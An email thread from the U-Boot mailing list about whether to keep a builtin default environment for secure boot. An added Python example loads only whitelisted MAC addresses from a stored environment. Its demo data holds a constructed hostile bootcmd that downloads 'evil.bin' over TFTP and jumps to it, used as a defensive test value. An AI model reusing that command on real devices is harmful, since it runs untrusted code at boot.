
On Wed, Nov 21, 2018 at 12:45 PM Wolfgang Denk wd@denx.de wrote:
Dear Stefano,
In message 9efc8990-118c-d5b9-802d-8190db2326d3@denx.de you wrote:
True, but this has side effects and limitations. You cannot change a variable in the default environment if you need to, because you do not know it. If some changes are needed, even for very small things like activating a GPIO before booting, you need to update the bootloader.
Just my words. (Mis)using the default environment for such purposes is broken by design.
Let's get rid of this!
Moving to a shared library should be done in the U-Boot project, then. Some changes are then required, at least in how the environment is locked (it is not clean as it is done now; locking should be done by the library and not by the caller).
Speaking of security... shared libraries open a number of new attack vectors, too...
In a secure boot environment, you cannot allow loading the environment from an untrusted source. We need a default environment in this case.
Or you make sure that changes are trusted.
Right, when we sign (and check the signatures of) all other images, then why not do the very same for some environment image?
You normally cannot sign the environment on the target when saving it if you are using private/public keys.
We are using a signed U-Boot image that, apart from the default environment, only needs to load MAC addresses. I cannot do this via a loaded environment (signed or unsigned), as the MAC addresses are stored in production and I cannot rely on production always having an up-to-date environment to embed their MAC addresses into when programming. To use environment loading here, I would have to implement a whitelist that only loads the MAC addresses from the saved environment. That sounds a bit hacky, too.
So when it comes to secure boot, I do think there's a use case for not loading an environment. I don't currently mind how this environment is initialized. And maybe I don't yet get what you are talking about when trying to get rid of the default environment. I do need U-Boot to run with a predefined environment without loading it.
Regards, Simon
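The whitelist approach Simon describes above (take only the MAC addresses from the stored environment, keep everything else from the signed builtin defaults), as an added worked example. This is illustrative code written for this page, not U-Boot's or libubootenv's own code. It assumes the non-redundant environment image layout (a little-endian CRC32 over the data area, followed by NUL-separated `key=value` entries and a terminating NUL), an invented builtin default environment, and an invented 1 KiB environment size; the MAC check mirrors what U-Boot's `is_valid_ethaddr()` rejects (malformed, multicast and all-zero addresses).

```python
import re
import struct
import zlib

# Hypothetical environment size for this example (real boards use the
# CONFIG_ENV_SIZE of their flash layout).
ENV_SIZE = 0x400

# Constructed builtin default environment, standing in for the one compiled
# into a signed U-Boot image.
DEFAULT_ENV = {
    "bootcmd": "run verified_boot",
    "bootdelay": "0",
    "verified_boot": "load mmc 0:1 ${loadaddr} fitImage; bootm ${loadaddr}",
}

# The only variables that may be taken from the stored (untrusted) environment.
WHITELIST = ("ethaddr", "eth1addr")

_MAC_RE = re.compile(r"^([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}$")


def is_valid_mac(value: str) -> bool:
    """Accept only well-formed unicast, non-zero MAC addresses."""
    if not _MAC_RE.fullmatch(value):
        return False
    octets = [int(o, 16) for o in value.split(":")]
    if octets[0] & 0x01:           # multicast bit set
        return False
    if not any(octets):            # 00:00:00:00:00:00
        return False
    return True


def pack_env(variables: dict, size: int = ENV_SIZE) -> bytes:
    """Build a CRC-protected environment image: <CRC32 LE><key=value\\0...\\0>."""
    data = b"".join(f"{k}={v}".encode() + b"\0" for k, v in sorted(variables.items()))
    data += b"\0"                  # second NUL terminates the list
    if len(data) > size - 4:
        raise ValueError("environment does not fit")
    data = data.ljust(size - 4, b"\0")
    return struct.pack("<I", zlib.crc32(data)) + data


def unpack_env(blob: bytes) -> dict:
    """Parse an environment image, rejecting it if the CRC does not match."""
    crc, data = struct.unpack("<I", blob[:4])[0], blob[4:]
    if zlib.crc32(data) != crc:
        raise ValueError("environment CRC mismatch")
    variables = {}
    for entry in data.split(b"\0"):
        if not entry:              # empty entry: end of list (rest is padding)
            break
        key, sep, value = entry.partition(b"=")
        if not sep:
            raise ValueError("malformed entry: %r" % entry)
        variables[key.decode()] = value.decode()
    return variables


def merge_env(default: dict, stored: dict, whitelist=WHITELIST) -> dict:
    """Start from the builtin defaults and import only whitelisted, valid values.

    Anything else in the stored environment (e.g. an attacker-supplied
    bootcmd) is silently ignored, so the boot flow stays the signed one.
    """
    merged = dict(default)
    for name in whitelist:
        value = stored.get(name)
        if value is not None and is_valid_mac(value):
            merged[name] = value
    return merged


def boot_env_from_blob(blob: bytes) -> dict:
    """What a whitelist-aware loader would hand to the rest of the boot flow."""
    try:
        stored = unpack_env(blob)
    except ValueError:
        return dict(DEFAULT_ENV)   # corrupt or missing store: defaults only
    return merge_env(DEFAULT_ENV, stored)


if __name__ == "__main__":
    # Constructed store: a valid MAC, a bogus second MAC and a hostile bootcmd.
    blob = pack_env({"ethaddr": "00:11:22:33:44:55",
                     "eth1addr": "01:11:22:33:44:66",
                     "bootcmd": "tftp ${loadaddr} evil.bin; go ${loadaddr}"})
    print(boot_env_from_blob(blob))
```

Note that the CRC only detects corruption, not tampering: anyone who can write the store can recompute it, which is why the defaults and the boot commands stay in the signed image and only the MAC addresses cross the trust boundary.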
That would even be _better_ as currently there is no, absolutely no check if the builtin default environment is in any way consistent.